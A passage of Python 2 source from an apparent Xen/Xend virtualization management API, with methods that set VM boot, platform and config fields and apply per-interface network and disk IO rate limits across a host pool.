host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_HVM_boot_policy(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_HVM_boot_policy', vm_ref, value)
else:
return self._VM_set_HVM_boot_policy(session, vm_ref, value)
def _VM_set_HVM_boot_policy(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if value != "" and value != "BIOS order":
return xen_api_error(
['VALUE_NOT_SUPPORTED', 'VM.HVM_boot_policy', value,
'Xend supports only the "BIOS order" boot policy.'])
else:
return self.VM_set('HVM_boot_policy', session, vm_ref, value)
def VM_set_HVM_boot_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_HVM_boot_params(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_HVM_boot_params', vm_ref, value)
else:
return self._VM_set_HVM_boot_params(session, vm_ref, value)
def _VM_set_HVM_boot_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('HVM_boot_params', session, vm_ref, value)
def VM_add_to_HVM_boot_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_HVM_boot_params(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_HVM_boot_params', vm_ref, key, value)
else:
return self._VM_add_to_HVM_boot_params(session, vm_ref, key, value)
def _VM_add_to_HVM_boot_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' not in dom.info:
dom.info['HVM_boot_params'] = {}
dom.info['HVM_boot_params'][key] = value
return self._VM_save(dom)
def VM_remove_from_HVM_boot_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_remove_from_HVM_boot_params(session, vm_ref, key)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_remove_from_HVM_boot_params', vm_ref, key)
else:
return self._VM_remove_from_HVM_boot_params(session, vm_ref, key)
def _VM_remove_from_HVM_boot_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' in dom.info \
and key in dom.info['HVM_boot_params']:
del dom.info['HVM_boot_params'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_set_PV_bootloader(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_bootloader', session, vm_ref, value)
def VM_set_PV_kernel(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_kernel', session, vm_ref, value)
def VM_set_PV_ramdisk(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_ramdisk', session, vm_ref, value)
def VM_set_PV_args(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_args', session, vm_ref, value)
def VM_set_PV_bootloader_args(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_bootloader_args', session, vm_ref, value)
def VM_set_platform(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('platform', session, vm_ref, value)
# edit by wufan
def VM_add_to_platform(self, session, vm_ref, key, value):
'''
@author: wuyuewen
        @summary: Change an attribute in the VM platform field.
@precondition: VM not running, key exists in platform field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute in VM platform field.
@param value: value to change.
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_platform(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_platform', vm_ref, key, value)
else:
return self._VM_add_to_platform(session, vm_ref, key, value)
def _VM_add_to_platform(self, session, vm_ref, key, value):
'''
@author: wuyuewen
        @summary: Internal method. Change an attribute in the VM platform field.
@precondition: VM not running, key exists in platform field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute in VM platform field.
@param value: value to change.
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
try:
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
plat[key] = value
return self.VM_set_platform(session, vm_ref, plat)
except KeyError:
return xen_api_error(['key error', vm_ref, key])
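    # Example (illustrative; 'api' as above): store a key/value into the VM's
    # platform dict, here the same 'boot' key that _VM_set_boot_order writes:
    #
    #     api.VM_add_to_platform(session, vm_ref, 'boot', 'dc')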
def VM_remove_from_platform(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
if key in plat:
del plat[key]
return self.VM_set_platform(session, vm_ref, plat)
else:
return xen_api_success_void()
def VM_set_other_config(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param value: a dict structure of other config.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_other_config(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_other_config', vm_ref, value)
else:
return self._VM_set_other_config(session, vm_ref, value)
def _VM_set_other_config(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Internal method. Set VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param value: a dict structure of other config.
@return: True | False.
@rtype: dict.
'''
return self.VM_set('other_config', session, vm_ref, value)
def VM_add_to_other_config(self, session, vm_ref, key, value):
'''
@author: wuyuewen
        @summary: Add an attribute to the VM other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute key.
@param value: attribute value.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_other_config(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_other_config', vm_ref, key, value)
else:
return self._VM_add_to_other_config(session, vm_ref, key, value)
def _VM_add_to_other_config(self, session, vm_ref, key, value):
'''
@author: wuyuewen
        @summary: Internal method. Add an attribute to the VM other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute key.
@param value: attribute value.
@return: True | False.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'other_config' in dom.info:
dom.info['other_config'][key] = value
return self._VM_save(dom)
def VM_add_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_tags(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_tags', vm_ref, value)
else:
return self._VM_add_tags(session, vm_ref, value)
def _VM_add_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'tags' in dom.info:
dom.info['tags'].append(value)
return self._VM_save(dom)
def VM_set_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_tags(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_tags', vm_ref, value)
else:
return self._VM_set_tags(session, vm_ref, value)
def _VM_set_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('tags', session, vm_ref, value)
def _VM_update_rate(self, session, vm_ref, type, vif_refs):
'''
@deprecated: not used
'''
eth_list = []
for vif_ref in vif_refs:
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
eth_list.append(eth_num)
#log.debug("--------------->eth list:%s" % eth_list)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
final_tag_list = {}
try:
other_config = self.VM_get_other_config( session, vm_ref).get('Value')
#log.debug('VM update tag')
if other_config:
tag_list = other_config.get(type, {})
if tag_list and isinstance(tag_list, dict):
for key, value in tag_list.items():
if key in eth_list:
final_tag_list[key] = value
dominfo.info['other_config'][type] = final_tag_list
self._VM_save(dominfo)
log.debug('VM_update_%s' % type)
return xen_api_success_void()
except Exception, exn:
log.exception(exn)
return xen_api_success_void()
#add by wufan
def _VM_update_tag(self, session, vm_ref, vif_refs):
'''
@deprecated: not used
'''
eth_list = []
for vif_ref in vif_refs:
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
eth_list.append(eth_num)
#log.debug("--------------->eth list:%s" % eth_list)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
final_tag_list = {}
try:
other_config = self.VM_get_other_config( session, vm_ref).get('Value')
#log.debug('VM update tag')
if other_config:
tag_list = other_config.get('tag', {})
if tag_list and isinstance(tag_list, dict):
for key, value in tag_list.items():
if key in eth_list:
final_tag_list[key] = value
dominfo.info['other_config']['tag'] = final_tag_list
self._VM_save(dominfo)
log.debug('VM_update_tag')
return xen_api_success_void()
except Exception, exn:
log.exception(exn)
return xen_api_success_void()
#add by wufan
def VM_set_all_rate(self, session, vm_ref, param_type, tag_list=None):
'''
@author: wuyuewen
        @summary: Set every VIF's rate or burst limit enforced by OVS;
                these attributes are stored in the VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
        @param param_type: 'rate' or 'burst'; rate is the bandwidth limit (kbps) of the
                VIF port enforced by OVS, burst (kbps) is the permitted burst above that rate.
@param tag_list: dict of rate for each VIF, the structure is {eth_num : rate}, e.g. {0:1000, 1:1000}
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_all_rate(session, vm_ref, param_type, tag_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_all_rate', vm_ref, param_type, tag_list)
else:
return self._VM_set_all_rate(session, vm_ref, param_type, tag_list)
#add by wufan
def _VM_set_all_rate(self, session, vm_ref, type, tag_list=None):
'''
@author: wuyuewen
        @summary: Internal method. Set every VIF's rate or burst limit enforced by OVS;
                these attributes are stored in the VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
        @param type: 'rate' or 'burst'; rate is the bandwidth limit (kbps) of the
                VIF port enforced by OVS, burst (kbps) is the permitted burst above that rate.
@param tag_list: dict of rate for each VIF, the structure is {eth_num : rate}, e.g. {0:1000, 1:1000}
@return: True | False.
@rtype: dict.
'''
log.debug('set vm all type: %s' % type)
if tag_list is None:
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
for vif_ref in vif_refs:
tag = self._VM_get_rate(session, vm_ref, type, vif_ref).get('Value')
self._VM_set_rate( session, vm_ref, type, vif_ref, tag)
self._VM_update_rate(session, vm_ref, type, vif_refs)
else:
for eth_num, tag in tag_list.items():
self._VM_set_rate_by_ethnum(session, vm_ref, type, eth_num, tag)
return xen_api_success_void()
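    # Example (illustrative; 'api' as above): cap eth0 at 1000 kbps and eth1
    # at 2000 kbps in one call; keys are interface numbers, values are kbps:
    #
    #     api.VM_set_all_rate(session, vm_ref, 'rate', {'0': '1000', '1': '2000'})
    #
    # With tag_list=None the per-VIF rates already stored in other_config are
    # re-applied instead.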
def VM_get_dev2path_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return xen_api_success(self._VM_get_dev2path_list(session, vm_ref))
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_dev2path_list', vm_ref)
else:
return xen_api_success(self._VM_get_dev2path_list(session, vm_ref))
    def _VM_get_dev2path_list(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Get a {device: img_path} mapping of the VM's disks,
                e.g. {'hda': '/home/sr_mount/2133.vhd'}.
        '''
storage = self._get_BNStorageAPI_instance()
dev2path_list = {}
vbd_refs = self._VM_get_VBDs(session, vm_ref).get('Value')
for vbd_ref in vbd_refs:
if self._VBD_get(vbd_ref, 'type').get('Value').lower() == 'disk':
dev = self._VBD_get(vbd_ref, 'device').get('Value')
# vdi_ref = self._VBD_get(vbd_ref, 'VDI').get('Value')
location = self._VBD_get(vbd_ref, 'uname').get('Value')
# location = storage._get_VDI(vdi_ref).location
dev2path_list[dev] = location
log.debug('_VM_get_dev2path_list')
log.debug(dev2path_list)
return dev2path_list
    # when the VM starts, async call to find the IO pid
def VM_start_set_IO_limit(self, session, vm_ref, io_limit_list={}):
'''
@author: wuyuewen
        @summary: Internal method. Apply disk IO rate limits when the VM starts.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return XendTask.log_progress(0, 100,
self.VM_start_init_pid2dev, session, vm_ref, io_limit_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_start_init_pid2dev', vm_ref, io_limit_list)
else:
return XendTask.log_progress(0, 100,
self.VM_start_init_pid2dev, session, vm_ref, io_limit_list)
# local call, called in VM_start_set_IO_limit
def VM_start_init_pid2dev(self, session, vm_ref, io_limit_list):
'''
@author: wuyuewen
        @summary: Internal method. Wait for the domain id, then apply the given or stored IO rate limits.
'''
        log.debug('VM_start_init_pid2dev')
        max_count = 0
        while max_count < 5:
            max_count += 1
            dom_id = self._VM_get_domid('', vm_ref).get('Value')
            if dom_id and dom_id != '-1':
                break
            time.sleep(2)
        if not dom_id or dom_id == '-1':
            log.exception('Init pid2dev failed, dom id is None!')
            return xen_api_success_void()
max_count = 0
        while max_count < 5:
max_count += 1
pid2dev_list = XendIOController.get_VM_pid2dev(dom_id)
if pid2dev_list:
break
time.sleep(2)
log.debug('get pid2dev_list:')
log.debug(pid2dev_list)
# self._VM_init_pid2devnum_list(session, vm_ref)
if io_limit_list:
for k, v in io_limit_list.items():
(type, io_unit) = k.split('_')
log.debug('Set disk io rate, type: %s %s, value: %s' % (type, io_unit, v))
self._VM_set_IO_rate_limit(session, vm_ref, type, v, io_unit)
else:
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
rate = self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit).get('Value')
if rate != '-1':
log.debug('Set disk io rate, type: %s %s, value: %s' % (type, io_unit, rate))
self._VM_set_IO_rate_limit(session, vm_ref, type, rate, io_unit)
return xen_api_success_void()
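    # Net effect of the method above: after a VM starts, either the caller-supplied
    # io_limit_list (keys of the form '<type>_<io_unit>', e.g. 'read_MBps' or
    # 'write_iops') or the limits cached in other_config are pushed into the blkio
    # cgroup for the freshly started domain.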
    '''get {VM_pid1: (major, minor1), VM_pid2: (major, minor2)}
    and cache the result in memory;
    called when the VM is started or migrated
'''
def VM_init_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_init_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_init_pid2devnum_list', vm_ref)
else:
return self._VM_init_pid2devnum_list(session, vm_ref)
def _VM_init_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
log.debug("VM_init_pid2devnum_list")
dev2path_list = self._VM_get_dev2path_list(session, vm_ref)
dom_id = self._VM_get_domid('', vm_ref).get('Value')
pid2devnum_list = XendIOController.get_VM_pid2num(dom_id, dev2path_list)
return self._VM_set_pid2devnum_list(session, vm_ref, pid2devnum_list)
    # clear the old pid2devnum_list before setting the new one
def _VM_set_pid2devnum_list(self, session, vm_ref, pid2devnum_list):
'''
@deprecated: not used
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) pid2devnum:' %(domname))
log.debug(pid2devnum_list)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config']['pid2dev'] = {} #clear pid2dev_list
for pid, devnum in pid2devnum_list.items():
dominfo.info['other_config']['pid2dev'][pid] = devnum
self._VM_save(dominfo)
return xen_api_success(dominfo.info['other_config']['pid2dev'])
def VM_clear_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clear_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_clear_pid2devnum_list', vm_ref)
else:
return self._VM_clear_pid2devnum_list(session, vm_ref)
def _VM_clear_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('clear vm(%s) pid2devnum:' %(domname))
if dominfo.info.get('other_config', {}) and \
'pid2dev' in dominfo.info['other_config']:
del dominfo.info['other_config']['pid2dev']
self._VM_save(dominfo)
return xen_api_success_void()
def VM_get_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_pid2devnum_list', vm_ref)
else:
return self._VM_get_pid2devnum_list(session, vm_ref)
def _VM_get_pid2devnum_list(self, session, vm_ref):
'''
        @summary: Internal method. Return the cached pid-to-device-number map from other_config, rebuilding it via _VM_init_pid2devnum_list when missing.
'''
try:
pid2num_list = {}
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
pid2num_list = other_config.get('pid2dev',{})
            # if we can't get it from memory, execute the command to rebuild it
            if not pid2num_list:
                log.debug("can't get pid2devnum_list from memory, execute cmd")
pid2num_list = self._VM_init_pid2devnum_list(session, vm_ref).get('Value')
log.debug(pid2num_list)
return xen_api_success(pid2num_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(pid2num_list)
def VM_get_vbd2device_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_vbd2device_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_vbd2device_list', vm_ref)
else:
return self._VM_get_vbd2device_list(session, vm_ref)
def _VM_get_vbd2device_list(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
vbd2device_list = {}
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
vbd2device_list = other_config.get('vbd2device',{})
return xen_api_success(vbd2device_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(vbd2device_list)
'''
type: read | write
    flag = True: execute cgroup cmd
    flag = False: just set the value in the config file
'''
def VM_set_IO_rate_limit(self, session, vm_ref, type, value, io_unit):
'''
@author: wuyuewen
        @summary: Set VM disk IO rate via cgroup; can set both read and write rates.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param type: read/write.
        @param value: rate (MBps or iops, depending on io_unit).
        @param io_unit: MBps | iops
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_IO_rate_limit(session, vm_ref, type, value, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_IO_rate_limit', vm_ref, type, value, io_unit)
else:
return self._VM_set_IO_rate_limit(session, vm_ref, type, value, io_unit)
def _VM_set_IO_rate_limit(self, session, vm_ref, type, value, io_unit):
'''
        @summary: Internal method. Apply the disk IO rate limit via the blkio cgroup and cache it in other_config.
'''
        #use /cgroup/blkio to control
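        # For orientation: XendIOController translates these limits into the
        # kernel's blkio throttle interface; a hand-rolled equivalent would be
        # roughly (assumed cgroup layout, for illustration only):
        #   echo "<major>:<minor> <bytes_per_sec>" > /cgroup/blkio/<group>/blkio.throttle.read_bps_device
        #   echo "<major>:<minor> <ops_per_sec>"  > /cgroup/blkio/<group>/blkio.throttle.read_iops_device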
try:
value = int(value)
if value >= 0:
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
tag = '%s_%s_rate' % (type, io_unit)
                log.debug('Set vm(%s) %s: %s' % (dominfo.getName(), tag, value))
dom_id = dominfo.getDomid()
dev2path_list = self._VM_get_dev2path_list(session, vm_ref)
pid2num_list = XendIOController.get_VM_pid2num(dom_id, dev2path_list)
XendIOController.set_VM_IO_rate_limit(pid2num_list, type, value, io_unit)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'][tag] = value
self._VM_save(dominfo)
# log.debug("current dominfo:>>>>>>>>>>>>")
# log.debug(dominfo.info['other_config'])
return xen_api_success_void()
            elif value == -1:
                tag = '%s_%s_rate' % (type, io_unit)
                log.debug("%s doesn't have a limit value" % tag)
                return xen_api_success_void()
            else:
                log.exception('VM set IO rate limit: value invalid')
                return xen_api_error(['Value invalid'])
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
'''
limit vm rate:
    flag = True: save config and execute cgroup cmd
    flag = False: just save the limit rate config
'''
def _VM_set_IO_rate_limit_1(self, session, vm_ref, type, value, io_unit):
'''
@author: wuyuewen
        @summary: Internal method. Set VM disk IO rate via cgroup; can set both read and write rates.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param type: read/write.
        @param value: rate (MBps or iops, depending on io_unit).
        @param io_unit: MBps | iops
@return: True | False.
@rtype: dict.
'''
        #use /cgroup/blkio to control
try:
value = int(value)
if value >= 0:
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
tag = '%s_%s_rate' % (type, io_unit)
                log.debug('Set vm(%s) %s: %s' % (domname, tag, value))
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
XendIOController.set_VM_IO_rate_limit(pid2num_list, type, value, io_unit)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'][tag] = value
self._VM_save(dominfo)
# log.debug("current dominfo:>>>>>>>>>>>>")
# log.debug(dominfo.info['other_config'])
return xen_api_success_void()
else:
log.exception('VM set IO rate limit: value invalid')
return xen_api_error(['Value invalid'])
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
def VM_get_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_IO_rate_limit', vm_ref, type, io_unit)
else:
return self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit)
def _VM_get_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
        @summary: Internal method. Read the cached IO rate limit for (type, io_unit) from other_config; returns '-1' when unset.
'''
rate = '-1'
tag = '%s_%s_rate' % (type, io_unit)
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
rate = other_config.get(tag,'-1')
return xen_api_success(rate)
except Exception, exn:
log.exception(exn)
return xen_api_success(rate)
def VM_clear_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clear_IO_rate_limit(session, vm_ref, type, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_clear_IO_rate_limit', vm_ref, type, io_unit)
else:
return self._VM_clear_IO_rate_limit(session, vm_ref, type, io_unit)
def _VM_clear_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
        #use /cgroup/blkio to control
XendIOController.clear_VM_IO_rate_limit(pid2num_list, type, io_unit)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
tag = '%s_%s_rate' % (type, io_unit)
log.debug('clear vm(%s) %s' %(domname, tag))
if dominfo.info.get('other_config', {}) and tag in dominfo.info['other_config']:
del dominfo.info['other_config'][tag] #clear config
self._VM_save(dominfo)
return xen_api_success_void()
def _VM_clean_IO_limit_shutdown(self, session, vm_ref):
'''
@deprecated: not used
'''
log.debug('shutdown clean: pid2dev and rate limit in cgroup file')
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
XendIOController.clear_VM_IO_rate_limit(pid2num_list, type, io_unit)
self._VM_clear_pid2devnum_list(session, vm_ref)
return xen_api_success_void()
def VM_set_rate(self, session, vm_ref, param_type, vif_ref, value):
'''
@author: wuyuewen
@summary: Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
        @param param_type: rate/burst; rate is the rate (kbps) of the VIF port controlled by OVS,
                    burst (kbps) is the burst allowance above that rate.
@param vif_ref: VIF uuid
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_rate(session, vm_ref, param_type, vif_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_rate', vm_ref, param_type, vif_ref,value)
else:
return self._VM_set_rate(session, vm_ref, param_type, vif_ref, value)
def _VM_set_rate(self, session, vm_ref, param_type, vif_ref, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
        @param param_type: rate/burst; rate is the rate (kbps) of the VIF port controlled by OVS,
                    burst (kbps) is the burst allowance above that rate.
@param vif_ref: VIF uuid
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) %s %s:%s' %(domname, str(vif_ref), param_type, value))
device = self.VIF_get_device(session, vif_ref).get('Value')
log.debug('vif_ref:%s VM_set_%s:%s rate:%s' % (vif_ref, param_type, device, value))
template = False
eth_num = ''
if device != '' and device.startswith('eth'):
eth_num = device[3:]
        elif not device:
#log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
#log.debug('vif refs: %s' % vif_refs)
try:
eth_num = str(vif_refs.index(vif_ref))
template = True
#log.debug('>>>>>>>eth_num" %s' % eth_num)
except:
eth_num = ''
pass
if eth_num != '':
log.debug('eth_num : %s ' % eth_num)
try:
if not template:
dominfo.set_rate(param_type, int(eth_num), value) # ovs_cmd
                #self._VM_get_other_config(session, vm_ref) # in order to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault(param_type,{})
dominfo.info['other_config'][param_type][eth_num] = value
#log.debug('other_config: %s' % value)
return self._VM_save(dominfo)
except Exception,exn:
log.debug(exn)
return xen_api_error(['device name invalid', device])
return xen_api_success_void()
def _VM_set_rate_by_ethnum(self, session, vm_ref, param_type, eth_num, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
